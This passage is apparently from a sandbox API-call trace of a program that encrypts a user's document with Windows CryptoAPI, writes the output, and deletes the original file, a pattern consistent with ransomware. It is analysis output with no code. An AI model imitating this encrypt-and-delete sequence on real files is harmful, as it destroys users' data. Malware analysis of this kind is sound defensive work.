hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49c10f0*, pdwDataLen=0x144de30*=0xb865, dwBufLen=0xb870 | out: pbData=0x49c10f0*, pdwDataLen=0x144de30*=0xb870) returned 1 [0083.417] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0083.417] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0083.417] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0083.418] WriteFile (in: hFile=0x298, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0xb870, lpNumberOfBytesWritten=0x144e834, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144e834*=0xb870, lpOverlapped=0x0) returned 1 [0083.420] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0083.420] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.420] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0083.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43c3590, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0083.421] CryptDestroyKey (hKey=0x41ac000) returned 1 [0083.421] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0083.421] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0083.421] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0083.421] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0083.421] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0083.421] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0083.421] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.421] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0083.421] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0083.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0083.421] CryptReleaseContext (hProv=0x41a4f20, dwFlags=0x0) returned 1 [0083.421] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.421] FreeLibrary (hLibModule=0x756e0000) returned 1 [0083.421] CloseHandle (hObject=0x258) returned 1 [0083.422] CloseHandle (hObject=0x298) returned 1 [0083.437] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\zSm3MoFqp.odp", nBufferLength=0x7fff, lpBuffer=0x143e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\zSm3MoFqp.odp", lpFilePart=0x0) returned 0x53 [0083.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9438 [0083.438] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\zSm3MoFqp.odp" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\zsm3mofqp.odp")) returned 0x20 [0083.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0083.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0083.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0083.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0083.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0083.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0083.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0083.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0083.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0083.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0083.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9b68 [0083.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0083.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4051040 [0083.438] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\zSm3MoFqp.odp", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd43305b0, ftCreationTime.dwHighDateTime=0x1d5ee22, ftLastAccessTime.dwLowDateTime=0x1c93bf30, ftLastAccessTime.dwHighDateTime=0x1d5ea6c, ftLastWriteTime.dwLowDateTime=0x1c93bf30, ftLastWriteTime.dwHighDateTime=0x1d5ea6c, nFileSizeHigh=0x0, nFileSizeLow=0xb865, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="zSm3MoFqp.odp", cAlternateFileName="ZSM3MO~1.ODP")) returned 0x41ac440 [0083.439] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\zSm3MoFqp.odp" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\zsm3mofqp.odp")) returned 1 [0083.446] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd43305b0, ftCreationTime.dwHighDateTime=0x1d5ee22, ftLastAccessTime.dwLowDateTime=0x1c93bf30, ftLastAccessTime.dwHighDateTime=0x1d5ea6c, ftLastWriteTime.dwLowDateTime=0x1c93bf30, ftLastWriteTime.dwHighDateTime=0x1d5ea6c, nFileSizeHigh=0x0, nFileSizeLow=0xb865, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="zSm3MoFqp.odp", cAlternateFileName="ZSM3MO~1.ODP")) returned 0 [0083.446] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0083.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4051040 | out: hHeap=0x1780000) returned 1 [0083.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0083.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0083.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0083.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d9438 | out: hHeap=0x1780000) returned 1 [0083.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0083.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0083.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0083.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0083.446] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0083.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0083.446] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0083.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0083.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0083.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0083.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0083.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0083.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0083.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0083.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0083.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0083.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ccec8 | out: hHeap=0x1780000) returned 1 [0083.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0083.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0083.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0083.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0083.447] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0083.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0083.447] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0083.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0083.447] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0083.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0083.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0083.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0083.447] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0083.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0083.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0083.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0083.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2940 [0083.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0083.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0083.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0083.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0083.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0083.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29f0 [0083.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0083.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0083.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0083.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0083.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a50 [0083.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0083.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0083.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0083.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafb8 [0083.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0083.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0083.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0083.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0083.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0083.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0083.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0083.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0083.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0083.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0083.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0083.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0083.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0083.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0083.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0083.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0083.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0083.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0083.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0083.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0083.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0083.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0083.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0083.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0083.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0083.449] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0083.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0083.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0083.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0083.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0083.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0083.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0083.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0083.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0083.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0083.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0083.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0083.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0083.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0083.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0083.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0083.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0083.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0083.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0083.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0083.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0083.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0083.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0083.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0083.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0083.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0083.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0083.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0083.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0083.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0083.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0083.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0083.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0083.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0083.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0083.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0083.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0083.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0083.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0083.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0083.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0083.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0083.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0083.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0083.451] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0083.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0083.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0083.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0083.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0083.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0083.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0083.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0083.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0083.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0083.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0083.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0083.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0083.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0083.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0083.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0083.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb360 [0083.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0083.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0083.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8c) returned 0x4051040 [0083.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0083.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0083.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0083.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0083.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0083.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0083.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x43ebc28 [0083.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ebc28 | out: hHeap=0x1780000) returned 1 [0083.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0083.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0083.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0083.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0083.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0083.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0083.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0083.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0083.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0083.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0083.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0083.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0083.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0083.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0083.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0083.453] RtlAllocateHeap (HeapHandle=0x1780000, 